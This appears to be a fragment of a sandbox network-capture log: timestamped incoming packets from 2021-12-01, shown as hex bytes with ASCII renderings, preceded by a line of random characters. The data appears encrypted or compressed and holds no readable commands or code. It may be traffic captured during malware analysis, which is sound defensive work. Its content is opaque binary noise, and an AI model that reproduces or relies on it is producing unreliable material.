l]a"a"z:[UX_-2/M/bqKS&yN&3v_n8yc3`X'-pgMr^@:J[aX^#NkK&ogT4:o5#f@3{2+f#MeO\|4C!7`#xnFqV-bN.7Cw)
2021-12-01 12:26:35 UTC	61	IN	Data Raw: b0 76 2f 6a ca 32 36 ab c2 84 58 17 a2 aa 6f ea 99 b5 2b a3 d7 87 af 55 9f 1c 5a 94 d1 7a 5f 01 27 b2 7d e7 e6 d6 55 f2 bb 64 77 24 95 3d c1 a9 f1 22 86 ae cd 49 3d 1b 19 c5 0c da 64 97 fb 81 66 70 71 48 43 c8 7b be 6c ff 96 55 95 cc cd 86 ec cb 82 0e e4 a4 4b 51 9a 52 38 01 a1 64 57 60 55 6e d4 bb fe 75 09 a4 a8 db 07 a0 bf 90 23 55 36 14 d1 8b d7 89 50 b6 e1 ca 0d 99 1e 6f 02 b0 c8 a3 f5 0b cc 19 3b 25 f1 df ce a2 ae c2 88 b4 fa 8c fa cb d8 db 2d b0 a8 d2 f8 f0 1c e8 4a 60 da e0 d5 84 16 4f 28 03 0c 1b 02 66 60 67 b7 4f 81 4f f1 03 85 c1 e3 f2 a2 12 50 bb 57 3b 26 b7 81 38 19 b3 ec 2c 16 4c 76 d3 40 b3 95 83 f5 3f b6 c0 58 09 55 53 ce 03 af d7 36 3a 71 2c fd 23 e3 13 a4 d8 09 41 aa 0d a5 ba eb 73 7b 5e 39 c9 7e 70 b8 f9 46 a9 ea fb f4 24 5b eb a6 0f f1 Data Ascii: v/j26Xo+UZz_'}Udw$="I=dfpqHC{lUKQR8dW`Unu#U6Po;%-J`O(f`gOOPW;&8,Lv@?XUS6:q,#As{^9~pF$[
2021-12-01 12:26:35 UTC	63	IN	Data Raw: 60 ee 81 1c b7 0f c4 00 74 33 06 ba 46 09 02 b7 da 73 7a 71 b3 2b 4d 31 ed 03 0f 4e 2d dd 98 76 6f e5 12 64 59 61 76 49 84 7a 03 75 8e ef 60 54 bc b7 76 40 df 0b 10 eb a3 92 df dd 70 6d 24 d0 07 25 3b 15 6a 3b 5f 95 82 45 d2 3b 9e e6 0d 36 24 b5 e4 61 3a ed d2 dd 54 e0 c6 c4 b0 ac 60 5c 64 3f 47 1e 7b 23 19 8d 8d f5 56 53 26 22 09 23 ec b2 26 c4 6a ac 7d 15 0c 59 40 a1 05 89 2e 9c de be f5 15 78 17 62 28 c0 30 83 9b 89 b2 e9 78 7e 1c 8a 8c 2f b0 9e 80 b7 45 66 d3 9d c5 3b e9 7d b4 85 4a b3 f0 a1 71 1d 02 9e 0c 99 bb df a6 fc 7b e5 2a 78 4d ea 24 f1 f5 49 0f a6 05 63 26 9b 52 02 dc c6 19 84 a3 19 cc 74 b0 1c 8c f4 98 9f 56 50 31 50 63 2a d7 f7 02 c1 9f dc d7 b7 e5 2b 32 66 7d 47 53 6a 55 b7 3e 26 2b 0e 7e 71 00 a1 e9 2b ef ce 40 50 69 6e ce 2e 5e 1c 37 f4 Data Ascii: `t3Fszq+M1N-vodYavIzu`Tv@pm$%;j;_E;6$a:T`\d?G{#VS&"#&j}Y@.xb(0x~/Ef;}Jq{xM$Ic&RtVP1Pc+2f}GSjU>&+~q+@Pin.^7
2021-12-01 12:26:35 UTC	64	IN	Data Raw: dd d5 9c 6d f5 ca 5b 76 c4 0a d0 8c 90 25 30 95 1a a2 3b 75 98 43 a2 b7 ce 0d 99 1e 99 59 b2 e2 ac b0 bb cd 58 05 87 e0 c6 c2 aa bd 16 9e a7 ea 69 24 c9 d8 79 3d a1 b9 d7 62 fd 15 cb 86 62 db e0 dc eb a7 1c 28 09 1f 8f 15 75 72 86 07 4d 81 5a e0 10 94 c9 79 e1 a7 08 71 bc 38 7c 27 b7 8b af 1c c0 9c 3b 05 40 5d 1f 51 b6 bd d9 e0 39 ac 51 eb 24 50 72 81 e0 bd c7 c8 2a 66 36 dc 86 e6 3f aa be ac 96 a7 18 bb 57 ec 65 94 59 30 32 57 00 b5 d1 6e c4 58 fc ff 37 5c 13 a7 08 09 64 63 39 c2 50 f9 16 bb fb 1d 94 14 5f a5 43 62 f0 2e c4 a5 41 2a 3a 73 c4 c1 2f c4 7d ed b5 1b 68 fd 21 60 46 d4 48 18 d6 db c1 60 e3 4d 5f 67 60 23 a9 43 41 d6 8a 80 c1 07 f5 16 ee 6f c1 5f 0e 9c 73 26 f0 22 fe d1 2e 33 c5 30 60 78 ee b1 0a c5 3f 41 08 0a 56 56 28 38 cd 30 1d 9c 41 c1 57 Data Ascii: m[v%0;uCYXi$y=bb(urMZyq8\|';@]Q9Q$Prf6?WeY02WnX7\dc9P_Cb.A:s/}h!`FH`M_g`#CAo_s&".30`x?AVV(80AW
2021-12-01 12:26:35 UTC	65	IN	Data Raw: 33 52 01 69 85 08 a3 b4 f5 c3 cc 96 2a c0 26 6e b0 2b f0 67 ab e5 15 01 4f 44 bd 03 b0 40 87 c8 98 22 31 78 17 f4 9b d6 25 83 5b 06 a9 ff 6d 77 14 27 7c 20 21 30 b6 06 72 70 c0 0a dd b2 41 76 a6 97 ec a3 35 a9 78 92 1f b2 0c 94 a9 52 bb f3 75 f3 90 d0 27 ee 24 6b cc 6a 10 b8 2f 41 37 90 45 48 de ca 17 97 a2 53 ce 7f be 30 bd 14 a9 44 25 23 21 57 76 18 c8 7a 17 d5 a1 e8 d2 0b cc 9e 28 45 6b ca 63 7c 6a 09 0d b3 3a 1b 67 fa 08 d5 06 0f f9 58 42 46 67 59 fa 86 df 1e 37 6e 9a 3e 37 95 7b 09 1a 2d ac c6 64 e2 4e 4b 3a d1 ba b3 81 fc 5e 6b 79 81 79 50 0f 5a 79 08 68 93 0d 0f bf 8c 4b ea 84 1a 4f f4 97 0f c4 75 4d 9f 61 ff db e8 21 7f 8c 28 00 de ae 97 7b 9f d3 9c d0 b0 6d 4b 15 f5 09 91 f2 42 7b f1 02 70 0b dd 20 dd 42 6d 0f dc e9 a0 ad 13 c5 fb 2a e7 28 57 a0 Data Ascii: 3Ri&n+gOD@"1x%[mw'\| !0rpAv5xRu'$kj/A7EHS0D%#!Wvz(Ekc\|j:gXBFgY7n>7{-dNK:^kyyPZyhKOuMa!({mKB{p Bm(W
2021-12-01 12:26:35 UTC	66	IN	Data Raw: 98 76 5f d1 ed 74 20 4b f5 40 82 77 d4 f3 bb 0c 76 f6 57 93 b1 23 91 31 bf 20 21 ab fd 09 22 c5 dd e3 7a 77 a2 b9 4b bb f4 1c 7e d3 2f f8 96 5d 59 57 05 e8 66 fd 67 4f 39 61 01 d8 a6 44 60 c8 a7 98 33 4b ff e7 38 01 a2 0e c4 f2 bb 60 3b 89 b3 10 3c 0a 6d 4b 0d 0b 93 44 dc 22 a9 a5 1e 21 35 27 e2 eb 22 e2 cd a0 db d7 d0 fd b6 ab eb c1 5c 20 56 09 45 23 38 86 b7 48 ca 42 2b 22 3a b9 4f a3 21 da 68 92 4c 04 0b 4c 79 98 88 96 3e 0e cf 9e 0a 14 6b 34 ef 1a d1 3e 83 01 2a a3 ee 66 c4 1b 35 89 00 04 87 a0 3d 5a 19 5f 3e d4 3c f7 71 8a eb 5a b4 e5 80 3b 7e ec 66 04 96 be 52 a0 e8 72 c0 8f fa 4d ea 35 62 cc 00 14 b8 23 8c 3f 9a 52 94 e0 d0 17 94 9d d5 d9 73 a9 53 b5 0a 98 95 6f 08 20 57 7c 1a d7 74 1a 10 93 e6 d0 3f e2 1f 7c 54 7d c3 94 7e 52 b8 57 b7 3b 1d 59 fc Data Ascii: v_t K@wvW#1 !"zwK~/]YWfgO9aD`3K8`;<mKD"!5'"\ VE#8HB+":O!hLLy>k4>*f5=Z_><qZ;~fRrM5b#?RsSo W\|t?\|T}~RW;Y
2021-12-01 12:26:35 UTC	67	IN	Data Raw: 6e 04 37 6c 54 a6 af 65 49 2a 1a 66 7b 5d 65 40 73 cd 0b c2 83 78 ec 46 0a 2b 06 3f 87 f9 48 f3 96 9d 31 d7 88 49 be de fb 83 2e 03 6b 13 a7 f1 a7 f4 13 dd 5d 1e 28 e6 05 c7 b3 a3 93 80 a5 f7 46 20 5f b9 e7 3d bd bf 11 eb fd 0d ff 5b 71 ea 02 c4 81 98 aa 3f d9 1b 4a 8e 59 60 be b7 5c 87 4c e0 06 0b 6c fb 28 b0 13 73 b6 7c 9e 37 b2 90 b2 8d a2 f9 2b 0b de 94 0f 6f ab 84 85 f5 37 bb 3b 48 2b c4 58 6a 1e bc d1 e0 3a 73 22 fa 49 38 a1 87 c1 0f 91 b6 1c be ac fc 7d fe 49 25 26 71 c8 6b 4f 6e ba ec ec f1 a9 60 07 a7 1e fd 4d d7 29 c7 72 8c 36 bb fd 78 2c 04 51 b8 81 8f ff 29 34 b5 33 0a 97 85 95 e0 07 f5 12 5f be 08 6d c1 e7 61 50 20 97 78 8f c8 d7 23 ff 4d 2c 45 62 23 af 56 4b cc 07 85 c3 07 f4 13 f6 7e db 46 26 c7 77 3c f6 80 ee d0 09 18 99 18 60 7e 4c ba 10 Data Ascii: n7lTeI*f{]e@sxF+?H1I.k](F _=[q?JY`\Ll(s\|7+o7;H+Xj:s"I8}I%&qkOn`M)r6x,Q)43_maP x#M,Eb#VK~F&w<`~L
2021-12-01 12:26:35 UTC	68	IN	Data Raw: 38 f3 77 2d 8d ef a0 c8 fb d2 df d3 9c fd 4d 69 33 5f 19 ee 25 71 bb 9e e3 c0 53 28 2a 75 1f 71 a3 2b c4 66 37 ca 04 0b 47 46 bd 87 15 02 83 c8 9f 19 10 71 06 f4 30 49 98 bc ad 14 a3 e4 76 62 1c 07 97 21 21 30 be 1f 56 67 d3 0b c5 38 e8 76 a7 0f 45 9c fc bb 67 8b 02 90 02 8f c2 64 b6 fb 6e e9 03 e9 48 85 0c 6c e4 44 01 b1 4a c8 27 9b 58 95 ca c2 10 98 3b 32 b2 5f ae 3c a6 18 9f b7 43 cd 20 5d 6d 0c ae 73 12 c6 8a f2 c9 21 2a 39 08 6d 5c db 42 67 59 98 36 88 29 0e 78 e7 39 9e f6 0e f3 8c 51 51 5c 48 ee ef 42 1c 37 68 8c b3 30 95 7b 08 0e 0e b9 ee c7 d5 4f 41 12 9e ba b3 8b 6a 61 6b 78 9b 5a 44 1e 29 6e 84 57 03 0d 0e 86 4f 2a eb 8e 38 18 fd f8 f0 d2 a3 ca a7 67 fd f2 9d 2e 69 95 36 13 dc bb ae 50 8b c2 9f 4d 08 14 ae 00 86 21 98 f5 53 b2 f6 c5 ec 40 f5 4b Data Ascii: 8w-Mi3_%qS(uq+f7GFq0Ivb!!0Vg8vEgdnHlDJ'X;2_<C ]ms!9m\BgY6)x9QQ\HB7h0{OAjakxZD)nWO*8g.i6PM!S@K
2021-12-01 12:26:35 UTC	70	IN	Data Raw: f1 09 8f a8 18 f3 a3 0b 6c b0 7f b1 22 b7 87 94 67 b7 fd 3c 2d dd 4d 19 46 c0 69 82 e4 33 c5 c3 58 25 5a 70 bd 61 b8 d1 30 03 f7 37 f4 db ca a8 af d1 18 e4 5b 13 af a3 82 8e 6b 58 2b 3f 57 21 b5 d1 6e 83 6b f9 ff 3b 60 7a a5 1e f1 16 ff 29 c7 72 cb ef ba fd 78 2e 3d 20 ab 57 9a d9 ba 3e a4 27 13 a8 58 9a c3 5c 3e 13 5f be 74 9f e8 df 6b 58 02 ca 7c 89 e4 ff e6 e7 4d 2a 6d f5 20 af 56 38 30 06 95 cb 68 09 04 f4 74 d3 61 a5 c3 77 20 de 04 eb cb 3f 33 1c 30 60 78 3f 5c 11 dd 1d 73 f1 0b 50 fe 31 0a 52 1c 43 9e 69 43 f1 54 e7 0a 23 25 e3 43 48 7a f6 90 d1 33 69 ce a0 e7 26 5f 16 78 db 26 31 a5 8d 14 b1 7f 52 9d ae 99 88 50 d8 b8 80 ea 9f 95 ad ff 38 bd 4d 99 0b 9f 31 d9 3c 60 db 18 13 6a 6b fc 2b 38 56 25 db 34 2f c6 b2 c3 76 25 c8 fb d0 3c a4 11 2f 1c a4 37 Data Ascii: l"g<-MFi3X%Zpa07[kX+?W!nk;`z)rx.= W>'X\>_tkX\|M*m V80htaw ?30`x?\sP1RCiCT#%CHz3i&_x&1RP8M1<`jk+8V%4/v%</7
2021-12-01 12:26:35 UTC	71	IN	Data Raw: c6 54 06 b2 15 22 47 e4 4e 11 a8 25 e3 26 9b 67 9f 03 c2 04 97 af 85 dd 72 bc 0c aa 0b b7 9d 56 cc b6 57 7c 1a d7 78 1b fe 95 fc c1 2b f4 3d 25 5a 66 25 43 41 46 8d 93 8d 2b 0e 7f fe 15 b9 f8 1d f1 52 40 5f 61 b6 ef 82 5d 04 24 60 8c a2 38 8d 85 09 22 32 a6 63 ec e2 4e 40 01 8c a3 a0 83 70 70 63 64 7e 6b 6e 17 59 69 9e 48 b0 91 10 84 34 4b fb 86 2d 1f 0a 96 29 da b2 c7 a9 7c 63 c5 f0 3c 61 9f 34 1e d2 a9 41 54 b1 d8 92 d4 d0 51 59 01 8c 34 86 e1 4c 68 f0 1b 7e 10 0b 4a f5 1a 7a 12 40 e8 a9 bc 14 47 ce 64 d8 5c 4f bf e3 70 18 73 af 1b 2a a6 97 bb 6a ee 70 ad 4d 8f b3 d4 b6 e1 22 38 cc 5d 5e cd fb 80 c9 0e a3 f8 69 8d 96 98 38 a5 40 89 82 0d e9 59 38 9d c6 6d c3 36 2e e9 66 82 e9 f5 46 f4 2c 42 e6 29 fa 2a 9f b4 98 9c 27 17 fa 6e 2e 13 13 c7 0a b6 ce 69 fa Data Ascii: T"GN%&grVW\|x+=%Zf%CAF+R@_a]$`8"2cN@ppcd~knYiH4K-)\|c<a4ATQY4Lh~Jz@Gd\OpsjpM"8]^i8@Y8m6.fF,B)'n.i
2021-12-01 12:26:35 UTC	72	IN	Data Raw: 20 3b 39 76 9d c3 22 1f 6f 5e b4 1b 74 f8 db 0e d8 2b 49 7e 9e 38 c4 6d f0 48 14 09 63 23 af 41 4f dd 02 83 ae 8e f5 05 f2 6d dd 61 61 c6 77 2c e7 84 fe ce 2e 74 10 35 60 78 23 38 10 dd 1d 0f 0b 02 78 ea 3a 22 d2 09 45 b0 66 c7 f5 5e c9 0d a4 21 e9 7c c7 86 f7 90 ca 5b bc c8 a0 ed 05 64 96 6d d3 19 f5 2c 89 14 a6 5f d1 b6 36 9b fb aa cf 35 8d 85 62 95 b9 e1 3a 9d 81 67 0a 95 2f e6 3c 70 c9 0d 01 df 4b fd 2b 39 3c ce ce 1c 86 ce a3 cd 31 b9 ca fb d0 56 a1 3b 21 17 cb 81 76 7e 8c 6e 5c 7b 34 0a 9f ed a3 6a 56 ab 27 f6 81 0f 8c 5e fc c0 fb 61 3d b5 3c 54 93 65 d4 4d ed 1d 60 ef 95 94 b2 20 7b 20 af 39 2e 26 da 18 0f b9 f1 f0 72 65 9b 2f 58 36 f5 0a f3 d5 3c da 86 6b 5b 52 3a c7 59 fd 6d 5a b3 a6 20 cc 88 f9 ed cf ad b0 68 5f eb f9 38 48 a3 0e c4 f2 f3 61 3b Data Ascii: ;9v"o^t+I~8mHc#AOmaaw,.t5`x#8x:"Ef^!\|[dm,_65b:g/<pK+9<1V;!v~n\{4jV'^a=<TeM` { 9.&re/X6<k[R:YmZ h_8Ha;
2021-12-01 12:26:35 UTC	74	IN	Data Raw: fd 7a 77 9f 7e 5d 7c d4 7f 8a 48 86 12 36 0b 2d 45 f5 98 12 c0 f4 97 05 4f b2 ce ab 76 df 21 fb 2f 69 03 34 18 d2 a5 9f 8e 9d d3 9a 5f ae 75 47 18 99 4f 0f e3 4a 77 fb 33 c7 1f f5 4b 45 53 65 09 4a f1 eb 31 03 d8 c6 27 e5 ed 46 ae e5 7d 11 22 ab 64 55 f5 1a ac f5 eb 31 af b3 fe b4 da af 6f 6f fb ca 31 33 db fa 0b 73 11 b3 a6 6d e0 e7 9f 3f 83 49 96 a2 52 6c 2b 56 83 c8 64 ce 38 60 ae 62 89 15 ed 59 eb 9d ac 66 29 fa b6 d1 a7 e1 e3 e4 17 f4 70 26 04 50 4a 13 a7 c2 88 b7 17 7a 56 54 57 04 5e b4 89 63 ce 78 83 86 dd 40 86 f3 c6 05 99 32 7c b5 ae f9 52 30 09 7d 68 5f ed 42 71 db 8e 55 09 f6 5b 76 52 33 86 97 9c 03 ab 25 1b a2 ad c6 87 45 b6 d6 99 91 88 1a ae 0e a9 ae 36 ce 05 d3 57 2f ce f1 df ce 3e bf 09 9b b1 fd 22 77 ca d8 7f 3f b4 76 d3 dd d8 2b f2 4a 6a Data Ascii: zw~]\|H6-EOv!/i4_uGOJw3KESeJ1'F}"dU1oo13sm?IRl+Vd8`bYf)p&PJzVTW^cx@2\|R0}h_BqU[vR3%E6W/>"w?v+Jj
2021-12-01 12:26:35 UTC	75	IN	Data Raw: 71 db 29 0f d2 88 38 b5 40 c8 9e a7 83 05 ad f5 ba a1 87 49 17 aa df 2e b5 39 57 03 9f ca cf e6 73 69 0b 17 43 3f 47 2b 38 22 d1 c5 28 0d 75 a3 c7 13 2f cc d3 7b 43 a5 15 07 a8 cb 87 6f 04 8b 64 48 59 a1 07 f0 fc b7 e7 5b 86 2b df 37 1f 98 70 77 d8 f9 6b 23 9a cc 5e bb c0 c6 c0 ec 72 79 ec 81 8a b5 04 ce 33 a4 0b 9a bb da 18 14 a6 eb ea e0 62 b7 a6 58 59 e9 1e 7e d8 2f d4 91 6c 42 7e 61 65 59 fd 76 40 8a 7d b9 df 88 fe 66 a7 21 b1 69 41 d7 49 14 eb a5 26 70 da 6f 6b 28 86 8a 31 14 3b 67 24 2f 30 d4 43 cd 35 cd a4 0c 36 2e 3a f2 77 22 f6 e5 dd ca f1 c7 cc 2d bd fc 4d 62 33 59 19 e8 24 0f 97 3d f2 c5 51 31 2c 0a 21 64 b4 ac f4 7e ba e0 17 1a 57 44 a1 8e 04 38 92 df b6 ad 15 78 1d d8 28 d6 39 04 a1 0a b2 fe 71 fc 22 07 9d 28 a5 57 b5 37 45 67 fb 15 d4 3c fc Data Ascii: q)8@I.9WsiC?G+8"(u/{CodHY[+7pwk#^ry3bXY~/lB~aeYv@}f!iAI&pok(1;g$/0C56.:w"-Mb3Y$=Q1,!d~WD8x(9q"(W7Eg<
2021-12-01 12:26:35 UTC	76	IN	Data Raw: 3c 44 db 3f 3e e4 ea 86 49 39 24 a7 7e e4 f4 85 3f 8b 43 97 a2 58 9f 22 59 94 dd 61 8c 25 46 81 7d e1 83 d4 6f f2 bd 68 b8 29 fc 00 c0 a8 eb fc 93 8b e5 7e 3d 0e 06 d6 0e b3 de 97 fa 95 69 70 55 4a 43 c8 8f 94 4d ed 81 32 84 dd dc 34 fd d9 1d af d6 44 16 ac 65 43 3e 1f 68 7d af 70 7f 6a c0 ad 42 8e f6 5d 60 e6 0c 88 88 9a 35 1f d1 1a a2 31 c8 82 57 bb c0 ed 11 67 15 9d 15 b2 ca 96 da 0b ca 4e 27 0b f1 df c4 b4 ee 76 8a b4 fa 4e e7 c6 d8 70 33 bf 56 c6 d4 f8 24 93 48 60 db ff c5 89 16 14 37 0a f2 9d 2f 7f b0 e2 b6 4f 80 72 e5 03 85 d1 8c ef a1 01 6a bc 38 d2 24 b7 8b b0 06 b9 f0 3a 0c 55 55 e7 41 9f 9d bb d4 3b aa 3e 46 39 5d 78 9c 07 42 d0 1a 25 74 40 fc df e2 35 c3 d8 1c 97 ad 19 b5 a4 ed 7a 75 48 df 36 53 49 b5 f9 51 ae ea fb e9 15 66 ed a6 14 e1 25 44 Data Ascii: <D?>I9$~?CX"Ya%F}oh)~=ipUJCM24DeC>h}pjB]`51WgN'vNp3V$H`7/Orj8$:UUA;>F9]xB%t@5zuH6SIQf%D
2021-12-01 12:26:35 UTC	77	IN	Data Raw: 81 a8 a6 08 d8 26 af 33 17 ac d1 33 1e aa fd f6 84 70 9f b5 44 3d f3 1b 68 2c 3d f6 85 68 44 46 15 7c a7 fc 4b 4c b0 72 08 2f 8c 94 09 c8 ad b4 43 69 fd ee 6d 82 a3 0e ca f0 6f 61 3b 90 ab 36 3c 22 67 24 25 0f 93 42 dc 23 b5 58 16 36 23 3e 0b 67 09 e0 d5 aa c8 f6 d7 25 a1 96 fe 5a 68 20 51 10 19 33 32 90 b4 e1 e1 a1 23 46 70 35 70 a7 0b f9 7c b9 9c 6e 0b 46 51 9d 99 98 29 90 f8 9c 0a 3d 78 17 fe 3f c7 2f 85 9b 1e 88 f5 67 61 1d e8 9c 04 ad 9f ab 37 42 70 2d 00 f8 3e e1 6c a2 1e 43 4a ee 96 65 aa 11 b2 f0 87 d6 28 b7 fb 60 d2 28 fa 4e 97 4f 6d e4 4a 3a b8 25 e3 35 ab 50 9e e5 c1 06 9b 10 85 dd 62 b9 37 87 10 98 98 41 32 21 7b 7e 13 ca 6b 14 d0 7e ff ed 29 e3 27 2d 42 73 25 43 41 48 b8 1c 8d c8 0c 05 81 11 a6 f2 24 db 50 52 2a 1a 48 ee aa 74 1c 37 68 9f 83 Data Ascii: &33pD=h,=hDF\|KLr/Cimoa;6<"g$%B#X6#>g%Zh Q32#Fp5p\|nFQ)=x?/ga7Bp->lCJe(`(NOmJ:%5Pb7A2!{~k~)'-Bs%CAH$PR*Ht7h
2021-12-01 12:26:35 UTC	79	IN	Data Raw: 85 66 bb f5 5b 05 ce 22 88 88 90 23 5f 27 33 b5 31 d7 83 59 96 c2 da 33 9c 14 b7 73 90 e0 aa d5 71 ce 2b 5e 24 f1 d9 a1 e1 af 07 8e b6 f9 79 b8 ce d8 7f 43 98 aa c7 f2 9f 27 f3 4a 66 d9 8f 97 85 16 1b 2b 2b 33 99 03 60 0f 96 b4 4f 8b 35 a2 02 85 dd e1 9d e1 00 60 be 54 e4 66 b2 81 ba 76 9b ff 3a 0f 25 1b 18 40 b5 97 ec a6 38 aa 38 5a 0d 11 7d 95 18 d3 f9 34 2b 7d 5c a3 dc e2 39 86 cf 0d a7 a5 12 87 a9 ed 73 62 58 21 26 69 57 9a ca 68 ac fd 03 fe 11 4a f5 ad 1e f0 73 fd 29 eb 7a b3 19 bb fa 6a d8 14 73 ad 7c 9e da db 38 df 5a 3b 3f 5f b0 e7 2d c1 6f 24 b4 1b 66 c3 df 61 50 39 79 7a 89 ca d7 62 e3 45 2c 45 73 35 a4 7b 50 cc 00 82 3f 06 d8 07 ec 75 db 4e 30 39 76 0a f4 97 e4 cb 3e 03 67 35 4c 7c 67 a2 3b 3e 15 67 70 0a 50 f0 13 00 d6 1b 3e e4 41 c7 f1 7e e1 Data Ascii: f["#_'31Y3sq+^$yC'Jf++3`O5`Tfv:%@88Z}4+}\9sbX!&iWhJs)zjs\|8Z;?_-o$faP9yzbE,Es5{P?uN09v>g5L\|g;>gpP>A~
2021-12-01 12:26:35 UTC	80	IN	Data Raw: 17 80 ae 18 8d 8d c3 4b 42 21 3d 86 33 6f b0 38 47 78 a5 f5 24 ec 46 55 b7 05 9e 36 96 e8 2c 0a 15 78 8b f8 26 d1 30 87 11 13 bc f9 47 c3 0a 16 9d b4 a9 98 b8 17 f5 66 d3 01 48 3a e9 7e bd 60 c7 b2 f0 a0 47 6f 13 99 13 19 ab 5c ac e4 2b 64 0c e7 51 f5 2b f1 e2 51 0d a7 64 7f 20 84 4c 81 d8 5d 00 84 aa a5 30 73 af 3c 30 0d 87 bf 49 b7 bc 51 63 2a de 7f 8f c0 9f dc e1 a7 f4 2c 2d d9 6d c4 61 4d af 93 1e a6 b7 08 61 c9 0e ed 6a 08 e6 77 4e 11 ea 4e f1 88 41 11 ab 6e 93 94 10 54 7b 08 0e a5 be f1 ef c2 c0 41 12 8b 26 b5 94 59 41 95 79 80 6a de 18 57 44 a4 81 93 0d 0e 0b 3a 54 c1 ae d5 15 f4 97 99 d5 bc ec ab 46 63 dc e4 02 76 ea b9 10 d2 93 a3 c9 9b cc b5 e3 34 7b 58 01 1a 2d 8c c2 5b 21 7d 15 7e 2e e3 d7 df 5d 59 36 8d ee a0 ad 8e d0 c6 08 da 31 da a8 fa d5 Data Ascii: KB!=3o8Gx$FU6,x&0GfH:~`Go\+dQ+Qd L]0s<0IQc*,-maMajwNNAnT{A&YAyjWD:TFcv4{X-[!}~.]Y61
2021-12-01 12:26:35 UTC	81	IN	Data Raw: f6 25 0b b4 4f 35 50 a2 92 ab 5e 3d aa 38 36 0f 52 78 93 01 b3 c2 3d 2b 66 38 e8 23 e3 13 bd c0 1b bf 12 16 af af c5 07 6a 58 2b 24 79 41 a2 da 68 ba e1 e2 f0 c3 49 c1 aa 17 e6 62 6c 3f c6 78 ae 0d ab ee 79 26 04 54 b5 a9 9d dd 32 49 86 23 3b 39 48 9d de 3c c9 12 4e bf 03 9c e8 f3 6b 52 02 dc 78 89 e8 db 7b f0 46 2c 54 69 3e 51 51 67 ca 01 86 c8 19 e7 0e f4 6f d0 5f d8 c6 5b 25 e1 93 e4 cb 28 10 86 26 9e 7f 60 a2 3b d8 2f 3b f2 f5 af fd 13 22 c7 28 46 98 08 c7 f5 54 4a 22 a4 30 f5 49 10 b7 f7 98 cc a2 95 e3 a2 f5 22 77 96 64 25 21 35 23 8b 6a 11 57 c5 9a b8 b7 69 ad d9 b2 81 9c 6e 94 a5 e3 d0 b4 0e 65 1d 93 3b c6 ff 8d c8 27 15 79 4e d6 e6 10 bf da da 3e 22 d4 a4 49 ae 3f 10 94 cc 46 a5 19 05 16 cb 87 76 47 98 66 bd 53 ac 0e 33 eb b5 f6 47 a6 0c b4 95 12 Data Ascii: %O5P^=86Rx=+f8#jX+$yAhIbl?xy&T2I#;9H<NkRx{F,Ti>QQgo_[%(&`;/;"(FTJ"0I"wd%!5#jWine;'yN>"I?FvGfS3G
2021-12-01 12:26:35 UTC	82	IN	Data Raw: 67 3c 4b c6 85 7f a3 c3 59 76 c4 28 91 9b 94 23 4e 21 0d 5c 30 fb 8a 4d a8 cd f2 1c 9d 0f 4f 01 9a e0 81 dd 20 47 51 25 25 ea ef cd a2 45 05 88 b4 55 51 fa da da 07 bf b0 a8 cd ee d8 32 f2 4a 6a cd ce f5 87 68 8e 28 03 06 8a 2b 48 60 be bc 59 b2 58 da 0c 81 a5 70 f2 a3 0b 76 90 79 cc 26 bd 97 8f 12 9b d3 38 05 4c 44 c4 ef b1 95 83 e7 2a ad 4d e5 25 50 72 9e 0f bb c2 27 3d 64 23 e5 cc 8d f6 ac d1 14 84 b5 39 b1 b8 fc 62 7a 37 c0 36 7f 56 a2 da 6f b9 e1 d5 c9 3f 48 e7 c9 d2 f7 65 09 39 d7 6f 72 01 ab ec 62 37 07 6d 73 24 20 f1 38 30 a9 37 3c 50 6c 98 c5 25 d5 c8 4c a7 08 6e d1 30 61 50 2a 4e 69 85 8d e3 60 e3 47 04 f8 66 23 a9 46 63 e2 07 95 cb 11 c7 0e fd 56 65 4d 26 c1 18 ea f6 80 e5 cc 28 17 f6 00 62 7e 46 88 af d9 17 1a 1a 22 7e f4 39 28 c2 2b 48 91 69 Data Ascii: g<KYv(#N!\0MO GQ%%EUQ2Jjh(+H`YXpvy&8LDM%Pr'=d#9bz76Vo?He9orb7ms$ 807<Pl%Ln0aPNi`Gf#FcVeM&(b~F"~9(+Hi
2021-12-01 12:26:35 UTC	83	IN	Data Raw: 36 a5 20 56 0c e0 a3 3e 12 9f e3 ca 1d 01 bd 1a 35 70 98 42 db 7e ba e6 2e 17 4b 55 be 81 66 28 af c5 9d 08 6e be 17 fe 3d 49 98 a5 84 0c ae ee 6e 7c f4 17 b1 31 ac 84 be e1 49 6d f8 41 d3 3e 8d a1 a2 19 5f 3a 58 ad bd b0 a7 8f 39 9e a0 43 be e2 9a f9 26 fc 5b c0 3e 60 e4 47 07 46 24 cf 24 83 5f 9e c4 d7 f8 9a 99 87 ca 7e af 35 b0 f5 99 b3 54 e7 25 6f 02 f4 3e 94 14 d1 56 f5 c6 23 c5 90 2e 5b bd f1 42 6d 4a 80 2e a0 2b be 7f ed 11 15 f6 0e e8 44 42 5e 4e aa ee ae 5e 1c 26 61 96 4d 31 b9 76 0c 0d e3 34 d1 c7 e2 4f 52 16 90 a9 ba 8b 61 68 75 87 81 46 72 0f 4c 79 08 68 93 0d 0f 81 14 ba eb 8e 38 2c 43 97 05 d3 b2 c5 a2 63 84 1c fb 2f 6d 9c b4 09 b2 e2 0b c9 8c d6 8c eb 83 7a 58 0b ac 34 9a e1 4d 68 f0 1a 7a e1 f4 67 dc 54 61 0a 42 e7 a0 bc 1b ca 27 3a e9 12 Data Ascii: 6 V>5pB~.KUf(n=In\|1ImA>_:X9C&[>`GF$$_~5T%o>V#.[BmJ.+DB^N^&aM1v4ORahuFrLyh8,Cc/mzX4MhzgTaB':
2021-12-01 12:26:35 UTC	84	IN	Data Raw: 83 bc 13 ab 97 49 3a 48 4e 13 68 f6 97 83 ee 2f ea 03 50 25 50 67 a4 0d b3 d1 27 24 68 76 0a dc ce 0b ae d2 6d a9 a5 12 a5 b6 e1 19 19 67 23 37 75 74 f1 d3 68 a1 fb f1 e7 e5 3b a9 a4 1e fd 4d 43 2a c7 72 8c 53 b9 fd 78 3e 7a db ae 57 9a 76 2b 30 bb 67 28 30 5b 8b ca 30 85 ec 5e 98 2c 60 eb ce 6b 4a 45 cd 79 89 e4 a4 5c e1 4d 26 3b 20 21 af 5a 63 8f 05 95 cb 05 8f c2 f4 7e df 3a 62 c5 77 2c de c7 ed cb 33 33 d1 36 60 74 23 25 11 dd 11 03 44 19 5f f4 28 2d cb 0e bd 99 6d d2 f7 52 65 33 ac 09 b9 45 3b 8c 98 12 da 5c 92 dc a5 f2 39 64 91 7c ca 2f 06 3c 77 15 9b 42 c7 98 2a 8e f3 84 83 b8 8a 8f 0d 16 ac f5 28 a6 25 78 1b 8c 34 ce f7 7c d2 f5 16 7e 47 ff 50 f1 28 da de 18 7d d2 b0 c8 